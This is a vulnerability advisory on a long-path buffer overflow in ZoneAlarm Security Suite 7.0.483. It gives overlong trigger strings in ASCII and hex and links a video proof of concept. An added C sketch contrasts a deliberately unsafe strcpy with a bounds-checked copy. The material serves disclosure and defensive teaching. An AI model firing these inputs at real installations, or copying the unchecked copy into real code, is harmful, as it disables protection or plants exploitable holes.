ZoneAlarm Security Suite buffer overflow

Application: ZoneAlarm Security Suite
OS: Windows XP (all patches up to date)
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description

ZoneAlarm is a well-known firewall;
its "Security Suite" edition also bundles tools such as antivirus, antispam and so on.

Details of the version

ZoneAlarm Security Suite version: 7.0.483.000
TrueVector version: 7.0.483.000
Driver version: 7.0.483.000
Anti-virus engine version: 3
Antivirus engine version: 5.0.1.85
Anti-virus signature DAT file version: 915051681
Anti-spyware engine version: 5.0.189.0
Anti-spyware signature DAT file version: 01.200801.3195
AntiSpam version: 5.0.6.8903


------------------------------------------------------
Vulnerability

The vulnerability arises because the program cannot analyze very long paths.
This causes a buffer overflow, with the possibility of code execution.

The flaw could be exploited by malware, for instance, to leave the system without protection.
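
As an added illustration (not code from this advisory or from ZoneAlarm), the C sketch below contrasts the bug class described above, an unchecked copy of a path into a fixed buffer, with a length-checked copy that fails closed. The 260-byte buffer size and all function names are assumptions chosen for the example.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 260  /* assumed buffer size (Windows MAX_PATH); not stated in the advisory */

typedef enum { PATH_OK = 0, PATH_BAD_ARG, PATH_UNTERMINATED, PATH_TOO_LONG } path_status;

/* Unsafe pattern, for contrast only: no length check before copying into a
 * fixed stack buffer, so a path of PATH_BUF bytes or more overruns it. */
size_t scan_path_unsafe(const char *path)
{
    char buf[PATH_BUF];
    strcpy(buf, path);
    return strlen(buf);
}

/* Hardened copy: measure the input with a bounded search, reject anything
 * that does not fit, and only then copy. src_cap is the size of the memory
 * src points into, so an unterminated input is never read past its end. */
path_status copy_path_checked(char *dst, size_t dst_size,
                              const char *src, size_t src_cap)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return PATH_BAD_ARG;
    dst[0] = '\0';                       /* dst is empty on every failure path */
    const char *nul = memchr(src, '\0', src_cap);
    if (nul == NULL)
        return PATH_UNTERMINATED;
    size_t len = (size_t)(nul - src);
    if (len >= dst_size)
        return PATH_TOO_LONG;            /* fail closed instead of truncating */
    memcpy(dst, src, len + 1);           /* len + 1 <= dst_size, NUL included */
    return PATH_OK;
}

int main(void)
{
    char dst[PATH_BUF];
    const char ok[] = "C:\\Windows\\notepad.exe";  /* constructed sample input */
    char long_path[1024];                          /* constructed over-long path */
    memset(long_path, 'A', sizeof long_path - 1);
    long_path[sizeof long_path - 1] = '\0';

    printf("short path: %d\n", copy_path_checked(dst, sizeof dst, ok, sizeof ok));
    printf("long path:  %d\n",
           copy_path_checked(dst, sizeof dst, long_path, sizeof long_path));
    return 0;
}
```

Rejecting the over-long path with an error, rather than silently truncating it, keeps the scanner from analyzing a different file name than the one it was handed.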
------------------------------------------------------
POC/EXPLOIT

A video proof of concept can be viewed here:

http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf 


Strings


ASCII: =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =B7 =85  A =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =85  AAAAAAAAAAAAAAAAAAA

HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41


ASCII: =85=85=85=85=85=85=85=85=85=85=85AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=85=85=85=85AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41




------------------------------------------------------
Juan Pablo Lopez Yacubian
